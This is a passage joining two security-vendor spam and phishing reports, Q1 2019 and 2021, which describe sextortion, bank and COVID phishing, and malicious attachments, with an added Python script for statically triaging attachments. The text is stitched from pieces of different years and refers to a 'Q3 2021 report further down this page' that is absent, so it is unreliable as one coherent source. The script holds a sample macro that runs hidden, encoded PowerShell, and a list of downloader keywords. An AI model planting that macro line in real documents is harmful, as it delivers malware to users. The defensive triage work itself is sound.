[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (they were actually harvested from social networks, online chats, forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the "employee" happened to know that the victim was a well-off individual with a reputation to protect, for which a payment of 10,000 dollars in bitcoin was demanded.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)

Playing on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc.
But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.

### Malicious attacks on the corporate sector

In Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)

We also observed malicious mailings aimed at stealing the financial information of international companies by distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)

### Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message; for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message.
The email itself stated that the bank had introduced some new security features, and that the account details had to be updated in order to use them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)

## Statistics: spam

### Proportion of spam in mail traffic

_Proportion of spam in global mail traffic, Q4 2018 – Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.

_Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

### Sources of spam by country

_Sources of spam by country, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%).
The Top 10 is rounded off by Vietnam (2.18%).

### Spam email size

_Spam email size, Q4 2018 – Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

### Malicious attachments: malware families

_TOP 10 malicious families in mail traffic, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

### Countries targeted by malicious mailshots

_Countries targeted by malicious mailshots, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

## Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites.
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.

### Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

_Geography of phishing attacks, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)

In second place, up from eighth, was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-placed Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.

**Country** | **%***
---|---
Brazil | 21.66
Australia | 17.20
Spain | 16.96
Portugal | 16.81
Venezuela | 16.72
Greece | 15.86
Albania | 15.11
Ecuador | 14.99
Rwanda | 14.89
Georgia | 14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

### Organizations under attack

_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._

This quarter, the banking sector remains in first place by number of attacks: the share of attacks on credit organizations increased by 5.23 p.p.
against Q4 last year to 25.78%.

_Distribution of organizations subjected to phishing attacks by category, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)

Second place went to global Internet portals (19.82%), and payment systems, another category that includes financial institutions, finished third (17.33%).

## Conclusion

In Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away; on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

_Source: "Spam and phishing in Q1 2019", Securelist, published 2019-05-15, https://securelist.com/spam-and-phishing-in-q1-2019/90795/ (CVEs referenced: CVE-2017-11882, CVE-2018-0802)._

## Figures of the year

In 2021:

 * 45.56% of e-mails were spam
 * 24.77% of spam was sent from Russia, with another 14.12% from Germany
 * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
 * The most common malware family found in attachments were Agensla Trojans
 * Our Anti-Phishing system
blocked 253 365 212 phishing links
 * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers

## Trends of the year

### How to make an unprofitable investment with no return

The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That is how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they would invite the "customer" to have a consultation with a specialist in order to come across as legitimate. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)

Similar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)

Another trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as.
In order to make sure the investors did not think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)

### Films and events "streamed" on fake sites: not seeing is believing!

Online streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)

However, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content; the only difference was that visitors might not be able to watch anything at all without registering. Either way, the registration was no longer free.
The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)

### A special offer from cybercriminals: try your hand at spamming

More and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to the people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than from some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)

### Hurry up and lose your account: phishing in the corporate sector

The main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page and entering their login details there.
That is why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)

The fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)

Another noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams, or a message about important documents sent via SharePoint for salary payment approval, aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)

### COVID-19

#### Scams

The subject of COVID-19, which dominated newsfeeds throughout the entire year, was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)

The sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals.
The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There is no guarantee that the code they are selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certificates in order to make the transaction.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)

#### The corporate sector

COVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)

Another malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result".
Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)

The "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)

Another type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work, accompanied by the need to take urgent action and read a "2 months salary receipt", was intended to make the recipient open the attachment with the malicious object as quickly as possible.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)

#### COVID-19 vaccination

While authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)

In both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details.
If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)

Another way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)

The scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)

We also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)

## Statistics: spam

### Share of spam in mail traffic

On average, 45.56% of global mail traffic was spam in 2021.
The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nAs in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), which also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as in 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. 
In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same number of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which creates malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. 
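Several of the families ranked above, and again in the Q3 2021 report further down this page, share a small set of delivery mechanisms that can be triaged statically before the attachment reaches a user: a VBA project that launches PowerShell (the SAgent pattern), an Equation Editor object embedded in a Word document or RTF file (the usual carrier for CVE-2017-11882 and CVE-2018-0802 exploits), and ISO disk images. The Python below is an added example written for this page; it is not Kaspersky's code and not the logic Mail Anti-Virus uses. The samples it inspects are constructed inside the script, the Equation Editor class id and the ISO 9660 descriptor offset are standard values, and the string scan of vbaProject.bin is a deliberate simplification: real VBA source is stored MS-OVBA compressed, so on live documents the scan should be replaced by oletools' olevba.

```python
"""Static triage of mail attachments for the delivery mechanisms the report ranks:
VBA macros that launch PowerShell (the SAgent pattern), Equation Editor objects in
Word/RTF files (CVE-2017-11882 / CVE-2018-0802 carriers) and ISO disk images.
Added example for this page; not Kaspersky's code. Samples below are constructed."""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"      # OLE compound file (.doc/.xls/OLE blob)
ISO_MAGIC, ISO_PVD_OFFSET = b"CD001", 0x8001         # ISO 9660 volume descriptor identifier
# Equation Editor 3.0 class id {0002CE02-0000-0000-C000-000000000046}, as stored on disk
EQUATION_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
EQUATION_HEX = b"4571756174696f6e2e33"               # "Equation.3" hex-encoded inside RTF \objdata
# Substrings typical of a macro downloader's VBA or of the command line it assembles
SUSPICIOUS_VBA = ["powershell", "-enc", "wscript.shell", "createobject",
                  "hidden", "downloadstring", "shell("]


def _vba_hits(blob: bytes) -> list:
    # Caveat: genuine VBA source inside vbaProject.bin is MS-OVBA compressed, so this raw
    # scan only sees what survives uncompressed; use oletools' olevba for real documents.
    low = blob.lower()
    return [s for s in SUSPICIOUS_VBA if s.encode() in low]


def triage_ooxml(data: bytes) -> list:
    """Findings for a zipped Office document (.docx/.docm/.xlsm)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        vba = [n for n in names if n.lower().endswith("vbaproject.bin")]
        if vba:
            findings.append("vba-macro-present")
            hits = _vba_hits(zf.read(vba[0]))
            if hits:
                findings.append("vba-suspicious:" + ",".join(hits))
        if any("/embeddings/" in n for n in names):
            findings.append("embedded-ole-object")
        # Word records an embedded object's ProgID in the part that references it
        if any(n.endswith(".xml") and b'ProgID="Equation.' in zf.read(n) for n in names):
            findings.append("equation-editor-object")
    return findings


def triage_attachment(data: bytes) -> list:
    """Return a list of findings for one attachment; [] means no heuristic matched."""
    if data.startswith(b"PK\x03\x04"):
        return triage_ooxml(data)
    if data.startswith(OLE_MAGIC):                      # legacy binary Office format
        findings = ["ole-compound-file"]
        if "_VBA_PROJECT".encode("utf-16-le") in data:  # OLE stream names are UTF-16LE
            findings.append("vba-macro-present")
        if EQUATION_CLSID in data or "Equation.3".encode("utf-16-le") in data:
            findings.append("equation-editor-object")
        return findings
    if data.lstrip().startswith(b"{\\rt"):
        low = data.lower()
        findings = ["rtf"]
        if b"\\object" in low:
            findings.append("rtf-embedded-object")
        if b"\\objupdate" in low:                       # makes Word load the object on open
            findings.append("rtf-objupdate-autoload")
        if b"equation." in low or EQUATION_HEX in low:
            findings.append("equation-editor-object")
        return findings
    if len(data) > ISO_PVD_OFFSET + 5 and data[ISO_PVD_OFFSET:ISO_PVD_OFFSET + 5] == ISO_MAGIC:
        return ["iso-image"]
    return []


# Constructed samples (no real malware) so the triage can be exercised offline
def sample_macro_docm() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        # Uncompressed stand-in for a VBA project: AutoOpen runs hidden base64 PowerShell
        zf.writestr("word/vbaProject.bin",
                    b'Sub AutoOpen()\r\nCreateObject("WScript.Shell").Run '
                    b'"powershell -w hidden -enc SQBFAFgA"\r\nEnd Sub')
    return buf.getvalue()


def sample_equation_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml",
                    '<w:document><o:OLEObject Type="Embed" ProgID="Equation.3" r:id="rId5"/></w:document>')
        zf.writestr("word/embeddings/oleObject1.bin", OLE_MAGIC + b"\x00" * 64)
    return buf.getvalue()


def sample_equation_rtf() -> bytes:
    return (b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
            b"{\\*\\objdata 01050000020000000b000000" + EQUATION_HEX + b"}}}")


def sample_iso() -> bytes:
    img = bytearray(ISO_PVD_OFFSET + 2048)
    img[ISO_PVD_OFFSET - 1] = 1                          # descriptor type 1: primary volume
    img[ISO_PVD_OFFSET:ISO_PVD_OFFSET + 5] = ISO_MAGIC
    return bytes(img)
```

Call `triage_attachment()` on each attachment pulled from a mailbox; a non-empty finding list is a triage signal to route the file to a sandbox, not a verdict. The checks say nothing about the Agensla, Badun and Noon payloads themselves, which are executables inside archives and need behavioural analysis rather than format inspection. ISO images earn a check of their own because, until Microsoft changed the behaviour in late 2022, files inside a mounted image did not inherit the mark-of-the-web, so SmartScreen and Office Protected View did not apply to them.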
Eighth place was taken by exploits for another Equation Editor vulnerability, [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target of malicious mailings for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. 
In total, 8.20% of Kaspersky users in different countries and regions around the world faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nAs in 2020, most of the phishing websites blocked in 2021 used a .com domain name; the share of .com rose 7.19 p.p. to 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. Third place went to the Chinese country-code domain .cn (7.14%). 
The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. 
The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. 
